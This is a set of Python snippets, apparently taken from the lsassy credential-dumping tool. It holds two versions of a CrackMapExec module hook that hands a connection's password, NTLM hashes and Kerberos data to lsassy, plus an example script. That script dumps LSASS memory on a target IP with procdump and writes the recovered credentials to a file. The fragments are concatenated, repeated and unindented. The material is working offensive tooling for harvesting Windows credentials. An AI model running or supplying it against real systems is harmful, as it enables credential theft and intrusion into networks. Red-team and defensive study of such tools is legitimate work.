def on_admin_login(self, context, connection):
if self.bloodhound:
self.set_as_owned(context, connection)
"""
Since lsassy is py3.6+ and CME is still py2, lsassy cannot be
imported. For this reason, connection information must be sent to lsassy
so it can create a new connection.
When CME is py3.6 compatible, CME connection object will be reused.
"""
domain_name = connection.domain
username = connection.username
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
password = "" if password is None else password
lmhash = "" if lmhash is None else lmhash
nthash = "" if nthash is None else nthash
host = connection.host
log_options = Logger.Options()
dump_options = Dumper.Options()
parse_options = Parser.Options()
write_option = Writer.Options()
if self.method:
dump_options.method = int(self.method)
if self.remote_lsass_dump:
dump_options.dumpname = self.remote_lsass_dump
if self.procdump_path:
dump_options.procdump_path = self.procdump_path
if self.dumpert_path:
dump_options.dumpert_path = self.dumpert_path
lsassy = Lsassy(hostname=host,
username=username,
domain=domain_name,
password=password,
lmhash=lmhash,
nthash=nthash,
log_options=log_options,
dump_options=dump_options,
parse_options=parse_options,
write_options=write_option)
credentials = lsassy.get_credentials()
if not credentials['success']:
context.log.error(credentials['error_msg'])
if context.verbose and credentials['error_exception']:
context.log.error(credentials['error_exception'])
else:
self.process_credentials(context, connection,
credentials["credentials"])
def on_admin_login(self, context, connection):
if self.bloodhound:
self.set_as_owned(context, connection)
domain_name = connection.domain
username = connection.username
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
kerberos = getattr(connection, "kerberos", "")
password = "" if password is None else password
lmhash = "" if lmhash is None else lmhash
nthash = "" if nthash is None else nthash
host = connection.host
log_options = Logger.Options()
dump_options = Dumper.Options()
parse_options = Parser.Options()
write_option = Writer.Options(format="json", quiet=True)
if self.method:
dump_options.method = int(self.method)
if self.remote_lsass_dump:
dump_options.dumpname = self.remote_lsass_dump
if self.procdump_path:
dump_options.procdump_path = self.procdump_path
if self.dumpert_path:
dump_options.dumpert_path = self.dumpert_path
lsassy = Lsassy(kerberos=kerberos,
hostname=host,
username=username,
domain=domain_name,
password=password,
lmhash=lmhash,
nthash=nthash,
log_options=log_options,
dump_options=dump_options,
parse_options=parse_options,
write_options=write_option)
credentials = lsassy.get_credentials()
if not credentials['success']:
context.log.error(credentials['error_msg'])
if context.verbose and credentials['error_exception']:
context.log.error(credentials['error_exception'])
else:
self.process_credentials(context, connection,
credentials["credentials"])
# Author:
# Romain Bentz (pixis - @hackanddo)
# Website:
# https://beta.hackndo.com
from lsassy import Lsassy, Logger, Dumper, Parser, Writer
log_options = Logger.Options(verbosity=2, quiet=False)
dump_options = Dumper.Options(method=2,
dumpname="lsass.dmp",
procdump="/opt/Sysinternals/procdump.exe")
parse_options = Parser.Options(raw=True)
write_option = Writer.Options(format="pretty",
output_file="/tmp/credentials.txt")
lsassy = Lsassy(hostname="192.168.1.122",
username="******",
domain="adsec.local",
password="******",
log_options=log_options,
dump_options=dump_options,
parse_options=parse_options,
write_options=write_option)
print(lsassy.get_credentials())